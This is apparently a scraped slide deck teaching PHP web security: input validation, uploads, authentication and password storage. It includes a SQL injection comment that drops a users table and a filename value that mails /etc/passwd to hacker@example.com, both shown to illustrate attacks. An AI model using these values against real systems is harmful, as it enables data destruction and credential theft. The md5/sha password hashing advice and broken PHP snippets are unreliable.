140 likes | 378 Views
PHP Security. SecurityServer Issues Patches SettingsApplicationsProgrammer responsibilitiesHosted SolutionsFind a good host that has a strong reputation for protecting their servers, applying patches and good customer serviceEx. Blue Host, RackSpace, MediaTempleCheapist is never cheapAdap
E N D
1. PHP Security IS 1059
2. PHP Security Security
Server Issues
Patches
Settings
Applications
Programmer responsibilities
Hosted Solutions
Find a good host that has a strong reputation for protecting their servers, applying patches and good customer service
Ex. Blue Host, RackSpace, MediaTemple
Cheapist is never cheap
Adapted from Securing PHP Web Applications by Ballard – Buy it!
3. PHP Security Application developer in Pgh
50% of the applications he has designed have been hacked mostly due to user failure of installing patches and upgrades.
Example:
Using hidden fields to carry over data about username, product and price in a shopping cart.
How would you protect?
Why does the problem still exist?
4. PHP Security Motivations for security breaches
Honest mistakes in typing
Boredom
Challenge of outsmarting the programmer
Curiosity
Malicious Intent
No application is too small to be attacked or destroyed
5. PHP Security Ex: Program
Small guestbook application
Allows anonymous comment
Allow users to enter name and comment logged in or not
Account creation
Upload small image
Admin can view and delete accts
Example: User writes the following comment:
This is a great guestbook); drop table USERS;
INSERT INTO comments VALUES (This is a great guestbook); drop table USERS;); or
INSERT INTO comments VALUES ($_POST[‘comment’]);
Server may complain about syntax but will execute
Not difficult to guess what some names of tables are
6. PHP Security User Input
Blank Input
Cause errors that confuse user or provide valuable hacker info
Control Chars
Non Alphanumeric – symbols
Excessive long inputs – buffer overflow
SQL Injection
Code Injection
Cross-Site Scripting
7. PHP Security Build a system to handle errors
Redirect user to another page
Display a formatted error message
Function error ($message) {
Return ‘<font color=‘red’>$message</font>’;
Test
If ($_POST[‘err’]) {
$html.=$_POST[‘err’];
Html.=‘<br>’;
This code checks to see if user is coming back from an error page
Code
Function error ($message) {
$formatted_error=‘formatted error message’;
http_redirect(‘guestbook.php’, array(err=$formatted_error);
8. PHP Security Stay away from system calls
Exec()
System()
Example:
You have a file upload system and user calls a file ;mail hacker@example.com < /etc/passwd and you pass this filename to the OS and issue command to mv $filename /home/guestbook/uploads
System will throw a syntax error but continue to follow the command of emailing your password file
9. PHP Security Test for unexpected Input
isnumeric()
Strip any HTML from User input
striptags()
If accepting html from users check it first to make sure it is safe
htmlentities()
htmlspecialchars()
Defeat mail spammers
Prevent users from sending emails to more than one person at a time
Use regular expressions to test for commas or semicolons in to section of mail message
10. PHP Security Buffer overflows
User gives more info to the program than it can handle
An area of memory overwrites with the code of the hacker
Sanitize USER data
Be careful of using RSS and remote DB’s
Check data length of input, strlen is your friend
Use mysql_escape_string function
Ex: http://corpocrat.com/2009/07/28/filtering-escaping-post-data-from-injection-attacks/
Apply patches to your system – network admin role
11. PHP Security Input Validation
Last line of defense is limits on data by your DB
Test for logical constraints
Length, cap letters, numbers only
Use regular expressions
Well tested examples available for email, etc – don’t have to write your own
Ex: http://devzone.zend.com/node/view/id/661
Files and Uploading
Check for malicious files – only accept certain types of files
Always use is_uploaded_file function when moving file from tmp to perm location
Set appropriate file permissions on uploaded files
Can upload an executable and if in web accessible directory then hacker is good to go
12. PHP Security User Authentication
Captcha
Keep out the bots
Scripts already written and can use for free
Lost password
Email to user
Role based systems
Give users roles in user table and check before they are allowed to perform an action
Directory based authentication
.htaccess file
Many hosted sites may limit you on this
13. PHP Security Storing Passwords
Allow strong passwords avoid dictionary words
http://phpsec.org/articles/2005/password-hashing.html
Use password hashing and store hash not the password
sha or md5 functions are available
Ecommerce system
Never store credit card info on your site always store on the provider!!!
14. PHP Security Advanced topics in Security
Session fixation
Session hijacking
Cross-site scripting
Session poisoning
Securing Apache
Hardening php.ini
Using test software to simulate attacks